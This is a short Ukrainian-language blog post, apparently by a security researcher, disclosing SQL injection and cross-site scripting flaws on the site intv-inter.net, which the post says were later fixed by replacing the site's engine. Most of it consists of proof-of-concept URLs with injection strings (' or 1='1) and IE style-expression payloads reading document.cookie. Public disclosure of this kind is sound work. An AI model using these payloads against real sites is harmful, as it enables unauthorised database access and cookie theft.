Уразливості на intv-inter.net
17:26 23.12.201118.05.2009
У вересні, 17.09.2008, я знайшов SQL Injection та Cross-Site Scripting уразливості на проекті http://intv-inter.net. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
23.12.2011
SQL Injection:
http://intv-inter.net/tv/programm/?id=7429146&act=tvp&channel='%20or%201='1
http://intv-inter.net/tv/programm/?id=7429146&act='%20or%201='1&channel=1plus1
http://intv-inter.net/radio/ch/?id=-1'%20or%201='1
http://intv-inter.net/tv/channel/intv/?id=-1%20or%201=1
XSS (IE):
http://intv-inter.net/tv/programm/?id=7429146&act=tvp&channel='style='xss:expression(alert(document.cookie))
http://intv-inter.net/tv/programm/?id=7429146&act='style='xss:expression(alert(document.cookie))'&channel=1plus1
http://intv-inter.net/tv/programm/?id='style='xss:expression(alert(document.cookie))'&act=tvp&channel=1plus1
Дані уразливості вже виправлені шляхом заміни движка сайта. Змінили один дірявий движок на інший дірявий (про уразливості в DLE я вже писав неодноразово).